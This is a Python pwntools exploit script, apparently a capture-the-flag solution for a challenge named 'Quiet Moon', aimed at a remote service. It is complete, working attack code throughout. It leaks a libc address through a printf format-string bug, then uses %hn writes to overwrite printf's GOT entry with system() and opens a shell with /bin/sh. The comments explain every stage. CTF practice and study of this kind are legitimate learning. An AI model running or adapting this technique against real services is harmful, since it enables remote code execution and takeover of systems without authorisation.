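# Quiet Moon -- 64-bit format-string exploit.
# The service echoes our input through printf(), which gives us an arbitrary
# read (%s) and an arbitrary write (%hn) once we place pointers on the stack.
# Stage 1 leaks a libc pointer from read@GOT, stage 2 rewrites printf@GOT to
# system(), so the next "echoed" line is executed as a shell command.
from pwn import *
import re

# `python exploit.py LOCAL` targets a local copy of the binary instead of the
# remote service (pwntools' `args` exposes bare KEY flags from argv).
if args.LOCAL:
    r = process("./quietmoon.copy")
else:
    r = remote("ctf.pwn.sg", 2901)

# GOT slots of the target binary. The addresses are absolute, so the binary is
# presumably non-PIE; re-check them with `readelf -r quietmoon` if it is rebuilt.
# The overwrite in stage 2 requires printf@GOT to be writable (no Full RELRO).
read_GOT = 0x601048    # leak source: holds a libc pointer once read() has been resolved (lazy binding)
printf_GOT = 0x601030  # write target: redirected to system()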
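# Stage 1 primitive: arbitrary read via "%8$s".
def leak(addr):
    """Read the NUL-terminated bytes at `addr` through the format string and
    return the first 6 of them zero-extended to a 64-bit little-endian integer.

    Payload layout (sent on one line):
      bytes  0..15  "|%8$s" padded with spaces -- the '|' is a marker so the
                    echoed output can be cut right before the leaked bytes;
      bytes 16..23  the address to read; it lands at positional argument 8
                    (the input buffer appears to start at argument 6, which is
                    consistent with the 32-byte offset -> %10$ pairing used in
                    stage 2 -- TODO confirm with a %p spray).

    Meant for pointers into libc: a userland x86-64 pointer is 6 bytes long and
    the %s stops at its first NUL, so a value with a zero byte in the low 6
    bytes cannot be leaked this way.
    """
    payload = b"|%8$s".ljust(16) + p64(addr)
    r.sendline(payload)
    # The banner is printed before our echoed input; skip to just past the marker.
    r.recvuntil(b"Can you find the Coven at /thecoven/flag?\n\n|")
    leaked = r.recvline(keepends=False)
    # Bytes literal + explicit padding keeps this working on Python 2 and 3
    # (the original str + bytes concatenation fails under Python 3).
    value = u64(leaked[:6].ljust(8, b"\x00"))
    # mmap'd libraries usually sit at 0x7f... on x86-64 Linux; anything else
    # means the leak was truncated or the service's output format changed.
    if not (0x7f0000000000 <= value < 0x800000000000):
        log.warning("leak(%#x) returned %#x, which does not look like a libc pointer" % (addr, value))
    return value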
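# --- stage 1: leak libc -----------------------------------------------------
read_LIBC = leak(read_GOT)

# libc offsets of read() and system(). NOTE(review): these appear to be the
# Ubuntu 18.04 glibc 2.27 values -- verify against the target's libc with
# `readelf -s libc.so.6 | grep -E ' (read|system)@@'` before reusing them.
READ_OFFSET = 0x110070
SYSTEM_OFFSET = 0x4f440
libc_base = read_LIBC - READ_OFFSET
# libc is mmap'd, so its base must be page-aligned. A misaligned base means the
# leak or the offsets are wrong and the GOT write below would just crash the
# target; an aligned base is necessary but not sufficient.
if libc_base & 0xfff:
    raise RuntimeError("libc base %#x is not page-aligned: wrong leak or offsets" % libc_base)
system_LIBC = libc_base + SYSTEM_OFFSET


def _hn_write_payload(value, target):
    """Build a format string that writes the low 32 bits of `value` to `target`
    with two 16-bit %hn writes (one per half-word).

    %n-style directives store the number of characters printed so far, so the
    two writes are ordered smallest count first and the second one only pads by
    the difference. Returns (fmt, first_addr, second_addr); the caller pads fmt
    to 32 bytes so the two pointers land at positional arguments 10 and 11.

    Caveat: `%<n>x` is a *minimum* width. If the stack argument it consumes has
    a hex representation wider than n (possible when n < 8), more characters
    are printed and the stored count overshoots; the original script has the
    same limitation.
    """
    lower = value & 0xffff
    upper = (value >> 16) & 0xffff
    # Pair each half with its destination, then order by the count to print.
    (count1, addr1), (count2, addr2) = sorted([(lower, target), (upper, target + 2)])
    fmt = ""
    # A zero width (`%0x`) would still print the argument's digits, at least
    # one character, and throw the count off -- emit no padding at all instead.
    if count1:
        fmt += "%%%dx" % count1
    fmt += "%10$hn"
    if count2 - count1:
        fmt += "%%%dx" % (count2 - count1)
    fmt += "%11$hn"
    return fmt, addr1, addr2


# --- stage 2: printf@GOT -> system ------------------------------------------
fmt, addr1, addr2 = _hn_write_payload(system_LIBC, printf_GOT)
# With 16-bit halves fmt is at most 26 bytes; this guards future edits, since a
# longer format would shift the pointers away from arguments 10 and 11.
if len(fmt) > 32:
    raise RuntimeError("format string is %d bytes, pointers would not land at args 10/11" % len(fmt))
payload = fmt.encode("ascii").ljust(32) + p64(addr1) + p64(addr2)
r.sendline(payload)
# From now on printf(buf) is system(buf): the next line we send is run as a command.
r.sendline(b"/bin/sh")
r.interactive()
r.close()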